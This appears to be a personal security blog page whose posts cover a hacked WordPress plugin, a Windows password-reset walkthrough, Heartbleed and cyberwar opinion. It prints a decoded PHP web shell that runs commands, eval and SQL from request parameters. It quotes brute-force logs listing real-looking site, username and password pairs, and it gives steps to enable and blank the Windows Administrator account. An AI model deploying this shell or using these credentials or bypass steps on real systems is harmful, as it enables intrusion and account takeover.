WordPress hack plugin GroupDocs

One of my wordpress blogs got hacked.  I was notified by google

I was apprehensive about accessing the site from my computer so i checked it out from my smartphone.  I figured most current malware attempts to download and install on windows systems, but are usually not smart enough to infect two different platforms (windows AND android).  The site seemed fine, but I am sure there is something wrong.  So I logged into the server.  The dates look a little suspcious but I the actual php files looked find.

I noticed a pattern with the dates that the files were access.  I am seeing scores of files/folders that have been “touched” and have the same date/time stamp Nov 22, 2015 12:00.  You only see that many files changed at once when a script does it.  I focused on those files and I can see that MOST of the Nov 22 1200 date/time stamps are on ONE plugin:   plugin GroupDocs.  I look at the error log:

INFO Started brute forcing.

INFO checking: drinkmusiccity.com, david, david
INFO checking: farmofpeace.com, salima, salima
INFO checking: fayjames.com, fay, fay
INFO checking: fantasyassembly.com, kevin-j, kevin-j
INFO checking: fionaraven.com, fiona, fiona
INFO checking: fishinglakes.com, Colby, Colby
INFO checking: firetown.com, firetown, firetown
INFO checking: fontainetours.com, claudia, claudia
INFO checking: foreverboundadoption.org, designteam, designteam
INFO checking: fotoparisberlin.com, amelie, amelie
INFO checking: frabonisdeli.com, bennett-fraboni, bennett-fraboni
INFO checking: freeloveforum.com, anne, anne
INFO checking: funkatech.com, incyte, incyte
INFO checking: futurist.com, brenda-cooper, brenda-cooper
INFO checking: futebolnas4linhas.com, ingrid-carvalho, ingrid-carvalho
INFO checking: freedomnewton.com, pastorc, pastorc
INFO checking: k-bell.co.jp, kohei, kohei
INFO checking: katrinakaif.co.uk, harish, harish
INFO checking: kcfw.de, c-mohr, c-mohr
INFO checking: kazu.co.nz, staff, staff
INFO checking: keneally.com, samcniotktaetl, samcniotktaetl
INFO checking: keratoconus.com.au, jim, jim
INFO checking: fundacjadantian.com, fundacjadantian, fundacjadantian
INFO checking: kibi-group.com, kibi, kibi

I look up the plugin GroupDocs.  I has had a MAJOR compromise:


It is being used as a backdoor into WordPress.  Honestly, I don’t remember even installing it.  I am not sure if it came with the theme I installed or what.  I start checking all more other blog’s plugins.  I don’t see it any where else.  Upon further inspection of the plugin, I can clearly see the PHP backdoor code:

sending: {
  "type" : "WPBF_RESPONSE",
  "linkPasses" : [
      "site" : "farmofpeace.com",
      "user" : "salima",
      "pass" : "salima"

      "site" : "i-entertainment.co.uk",
      "user" : "nicolai2014",
      "pass" : "nicolai2014"

      "site" : "020haopai.com",
      "user" : "siteadmin",
      "pass" : "siteadmin"

      "site" : "zargarcarpet.com",
      "user" : "akeel",
      "pass" : "akeel"

      "site" : "haubstadtsommerfest.com",
      "user" : "joeyconti",
      "pass" : "joeyconti"

Starting brute forcing WordPress
CURRENT TIME: 2015-11-20 15:47:06
CURRENT TIME: 2015-11-20 15:47:37
CURRENT TIME: 2015-11-20 15:48:08
CURRENT TIME: 2015-11-20 15:48:39
Child dead. Reading response: 
Done. read: 0 bytes

The Fix Action:

OSCP certification attempt

oscp certs

oscp certs

I have a goal of taking the Offensive Security Certified Professional (OSCP).  I will attempt it in the next 3 years.  I figure it gives me time to study and gain experience  programming to do advanced infiltrations on information systems.

I have been doing Information Security analyst work for a while and I enjoy doing it.  But I want to see all sides of security not just what an attack looks like from the inside looking out but from the outside looking in.

The main reason I want to attempt the OSCP is for fun.  I enjoy puzzles.  I want the challenge of it even if I fail miserably.

As certifications go, I think its the future of high-level certifications.  Not unlike the Cisco, and Red Hat Certifications, the OSCP takes practical skills to pass.  Pure written exams lend themselves to braindumps and crowdsourced cheating.  An overwhelming number of “IT professionals” now have lots of certifications with very little experience.  The reason I don’t like this is because I don’t like carrying other peoples weight.


Am I affected by the heartBleed bug



YES. If you use SSL/TLS – which is in https, secure Instant messaging, secure email on other “secure” services online, then there is a better than 60% chance you are affected or have an account that was vulnerable.


What can you do about it?

Get informed. Here is a little information on what it is, what it affects and how to protect yourself and/or organization.


Why should you be concerned?
This weakness allows attackers to steal information you thought was protected.  So things like bank, hospitals, and other critical resource may have been susceptible to the vulnerability for years.
As mentioned above, SSL/TLS provides security for banking, online shopping, instant messaging, email and other services.  The heartbleed vulnerability allows anyone on the Internet to read the memory of the systems protected by vulnerable versions of OpenSSL.  If someone can read the memory of the system, they can access the secret key used to identify the service providers, and to encrypt the traffic, the names and passwords of users.
More on HeartBleed:
Heartbleed is a major vulnerability in OpenSSL.  This vulnerability has been known since 2012 or 2011 by NSA and others.  The NSA used it as a method of infiltrating systems for spying (rather than notifying the good citizens of Earth).  The NSA is not winning friends lately.
What versions of OpenSSL are affected?
Users and service providers using OpenSSL 1.0.1 through 1.0.1f .
Who is Safe?
According to codenomicon‘s site http://heartbleed.com/
  • OpenSSL 1.0.1g is NOT vulnerable
  • OpenSSL 1.0.0 branch is NOT vulnerable
  • OpenSSL 0.9.8 branch is NOT vulnerable

Bug was introduced to OpenSSL in December 2011 and has been out in the wild since OpenSSL release 1.0.1 on 14th of March 2012. OpenSSL 1.0.1g released on 7th of April 2014 fixes the bug.
more on heartbleed:
In the news: http://abclocal.go.com/kgo/video?id=9498581


Windows Password Recovery: ONTPRE

Offline NT Password & Registry Editor (ONTP&RE)

Did you lock yourself out of your Windows system?  Forgot your Windows password?  What is the best Windows password recovery?

The best way is to have a Windows Recovery disc ready.  But this is something you must do BEFORE you get locked out.



There are tools you can use to get into your system, but the first think you should try is to use “Administrator” as the user with no password.  “Administrator” is a default account on Windows systems.  On Windows 7 it is disabled by default but if someone has used the account you may be able to use it as backdoor into the system.

If their is not Administrator account and no Windows Recovery disc you will have to use a Windows password recovery tool.  ONTP&RE is a password recovery tool that allows quick access to windows systems.

Reset Password : Windows 7

1.  Download ONTP&E: First, download the Windows password recovery software from pogostick.net . pogostick.net/~pnh/ntpasswd/cd110511.zip

2.  Unzip ONTP&E:  Files are compressed into 1 folder named ( cd110511.zip).  Unzip the file.

3.  Create CD with ISO:  Set the cd disc creator into ‘image to  disc’’. Burn the image to the cd.  Each CD burner software is different, so you will have to figure out how to create a CD from the ISO.  Sometimes its as easy as double clicking the ISO but it depends on the type of software.

4.  Reboot & Insert:  Actually, you need to make sure your Windows system is able to boot from the CD.  Once its done , insert the cd back to the CD ROM  and reboot your computer.

5.   Computer Boot from CD:  As your computer reboots, keep hitting F2 to go through the BIOS.  Select “Boot Options”.  Some versions of BIOS call this “Boot”.  But the idea is the same.  Go into the BIOS and make sure CDROM is on the top of the list for boot options.  This means that the computer first looks at the CD before going to the Hard Drive.  Instructions on modifying BIOS settings will be listed on the page.

6.  Boot into ONTRE:  Once the BIOS boot option is set, save and exit.  Your system will boot into your ONTRE disc.  Software will start running. Just follow the steps.  “Press enter” to boot into the “Offline NT Password & Registry Editor” CD.

windows password recovery

screen shot of Offline NT Password & Registry Editor

7.  Select an Account:  It will ask you to select an account.  If you hit “Enter” it will automatically boot into the [Administrator] account.

*note: Anything in [brackets] is the default value, so if you hit “Enter” it will auto-magically choose that [bracket] value.. its a linux thing.. you wouldn’t understand.

If you choose the “Administrator” account, you may need to Enable the account since the built-in Administrator account is  disabled by default in certain versions of Windows.

8.  Enable Built-in Administrator Account:  The Windows account  needs to be enabled.  Select 4  and enter ‘to Unlock and enable user Account’.

windows ontpre menu enable

windows ontpre menu

9.  Clear (blank) User Password:  After selecting 4-Unlock and Enable user account, you will be sent back to the User Edit Menu. If you want to clear the Administrator password (if it has one) then hit enter or type Administrator and Select 1 and “Enter” – to clear the user password.

10.  Save Changes:  Once you have made all the changes you want (enabled the Administrator account & cleared any passwords), you are ready for the next step.  Hit  ‘!’ and enter.

Windows Password save changes

Windows ONTP&RE password save change

On the screen it asks ‘What to do’?  hit q to quit. You will see:

Step FOUR:  Writing back changes

“About to write file(s) back.  Do it ?’’

Hit   Y  and enter to save changes.

11.  Last Step:  Hit “Ctrl-Alt-Del” to reboot and eject the cd quickly.  This will allow the system to boot into Windows on the Hard drive.

You can now login as “Administrator” with NO password.

Once you are in as Administrator you can change passwords of any local accounts in Control Panel | Users.

Evil Plug-ins

I love plug-ins! I love them on Firefox, WordPress, Dreamweaver and now on Chrome. It has crossed my mind that some of these plug-ins could be created and distributed by very smart people with criminal or mischievous intent. But the reality of bad plug-ins didn’t hit me until I noticed a link on digg.com about Stealing Logins using Google Chrome Extensions. I am no programmer but understand enough to see how cleaver it is.

Basically, someone creates a innocent looking extension or plug-in, they distribute it and the innocent looking plug-in/extension sends your personal information to where ever.

How can a person avoid this?! I guess the safest way would be to not use ANY plug-ins and extensions.. but that is over kill.
I know that I am pretty paranoid about WordPress extensions/plug-ins but the open source community is pretty good about peer reviewing, testing and reviewing some of the more popular plug-ins. When it comes to software I depend heavily on reviews of others who have used the product. If there are no reviews (even on forums or dev/plug-in sites), I usually consider the app to risky.

Sometimes what I do is try the app/extension/plug-in on a site/blog I don’t care as much about. In the case of browser plug-ins, I use a single trusted browser with minimal plug-ins to do important sensitive/personal transactions. Most of the stuff I do on the web does not require so much scrutiny.

Unfortunately, there is always a risk with plug-ins, apps, and extensions. All we can really do is manage the risk, by being careful and suspicious.

Thanks Mr. Grech for the knowledge.

Server at Magic Requires Username Password

The WordPress “Magic” hack!

If your getting this message: “The server (our server domain, e.g. DOMAIN.COM) at Magic” Then you likely have infected code in your wordpress blog.

Wordpress Magic Attack

Wordpress Magic Attack

Wordpress user Yokima reported this very slick hack.

And the fix is to update your blog. This will fix the issue. Make sure you change your password if you actually put your information in that “serve at Magic” message box. Although updating the the wordpress blog definitely fixes the issue, you may have to reload your pluggins too because they may also have some infect code. Doing further research on this matter.

*Similar issues reported by techartistserver BLAH.fuzz.com at Fuzz Access requires a username and password.”

What the infected code looks like after the malware injection into your blog.. yep.. uuugly!

From RocketWood:
We noticed that the code injected into the files was run through an eval and a decode so we decoded the string and found this php code:


if (!function_exists('______safeshell'))


function ______safeshell($komut) {



$disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));

if (!empty ($komut)) {

if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {

//@ ob_start();

@ passthru($komut);

//$res = @ ob_get_contents();

//@ ob_end_clean();


elseif (function_exists('system') && !in_array('system', $disable_functions)) {

//@ ob_start();

@ system($komut);

//$res = @ ob_get_contents();

//@ ob_end_clean();


elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {

$res = @ shell_exec($komut);

echo $res;


elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {

@ exec($komut, $res);

$res = join("\n", $res);

echo $res, "\n";


elseif (@ is_resource($f = @ popen($komut, "r"))) {

//$res = "";

while (!@ feof($f)) {

//$res .= @ fread($f, 1024);

echo(@ fread($f, 1024));


@ pclose($f);




$res = {$komut};

echo $res;





if (isset ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'])) {

echo "\n";

if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'eval') {

eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);


else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'exec') {

______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);


else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'query') {

$result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);

if (!$result)


echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";



else if (is_resource($result))


$res = array();

while ($row = mysql_fetch_assoc($result))


$res[] = $row;



echo serialize($res);





echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";




echo "\n\n";




p.s: don’t feel too bad, even the security masters get hacked by malicious S.O.B’s.

You Hack US, We Nuke You!

The United States’ top commanding officer for the space and cyber domains told reporters last week that a cyber attack could merit a more conventional military response.

During a press briefing on Thursday, U.S. Air Force General Kevin Chilton, who heads the U.S. Strategic Command, told reporters that top Pentagon advisors would not rule out a physical attack on any force that attacks the United States through the Internet. Currently, the military’s networks are probed thousands of times a day, but the goal of attackers seems to be espionage, not to take down critical networks, he told reporters –

Security Focus

I don’t believe that military force is the equivalent action for a cyber attack. Arrest and/or apprehension is the physical response necessary for criminal hackers attacking from other countries. Cyber counter-attacks are the correct response for government funded & coordinated attacks.

I think if the U.S. reciprocates a cyber attack x10 when other countries are playing little games, we’d get our message across effectively. We should do so in a well funded and covert way in which the enemy has NO DOUBT that the face slap came from a U.S, hand, but no proof at all allowing plausible deniability. It should be black Ops hacks, very well coordinated, very well funded and full time.

I don’t think the US can be complacent or wrecklessly meek in matters of cyber warfare. Instead, it must be fair, quiet and heavy handed when it comes to one of its most valuable asset, information.

Weaponized Hacking

This is not your momma hacking. This is militarized hacking, Pentagon style. It is state funded with the intent of allowing the killing of people and the breaking of things.

“U.S. Defense Department officials were so impressed with the level of coordination between ground military ops and cyberattacks against strategical targets during the recent conflicts, that they are now looking for ways to weaponize hacking. Aviation Week glanced at such a device and reports that it is being designed to be easily used even by non-techy soldiers.”

Welcome to the neo-CyberArms race! Where uncontrollable cyber weapons that can turn off cities and detonate public utility plants with the touch of a button! This is not the beginning of a William Gibson novel, this is not the synopsis of Snow Crash, or the theme of a cyberpunk trilogy this is reality… virtual reality.

On a serious note, I think China has already weaponized hacking. Hopefully, this is not the first time the US has thought about this.

Torpig Botnet Hijacked

Brett Stone-Gross, Marco Cova, Lorenzo Cavallaro, Bob Gilbert, Martin Szydlowski, Richard Kemmerer, Chris Kruegel, Giovanni Vigna of the Security Group Department of Computer Science University of California in Santa Barbara hacked into a botnet called Torpig.

Torpig gathers credit card, bank accounts and other sensitive data and sends it to criminals. The botnet had stolen 70 GB of data.

The security group took advantage of the open, decentralized nature of peer-to-peer to infiltrate it. Victims are infected by drive-by-download attacks.

They use phishing sites and advertise them on google, facebook, myspace and other popular sites. They also use email. To hijack the botnet they exploited a vulnerability in the way the malware generates a list of domains it contacts.


Not becoming a victim in the first place is the most ideal situation, however. The researchers concluded that victims of botnets are usually those with poorly maintained machines and who choose “easily guessable” passwords. ” This is evidence that the malware problem is fundamentally a cultural problem,” reads the report. “Even though people are educated and understand well concepts such as the physical security and the necessary maintenance of a car, they do not understand the consequences of irresponsible behavior when using a computer.” – Jacqui Chen

Critical Infrastructure Infiltrated

So apparently, part of the U.S. critical infrastructure has already been exploited. It doesn’t surprise me. Its all fun and games with developers, engineers and scientists until their ass is getting hacked. They resist. They say “who the hell would hack this system” “HOW the hell would they hack it”. They cut corners and make excuses. Then, when the system is hacked, they blame it on the rain. The good news is that they know its been infiltrated.

I wonder why they didn’t design it as a closed network. Make all critical functions completely inaccessible to the outside world. It’s got me wondering if they even used an Information Assurance standard.

1 2 3 8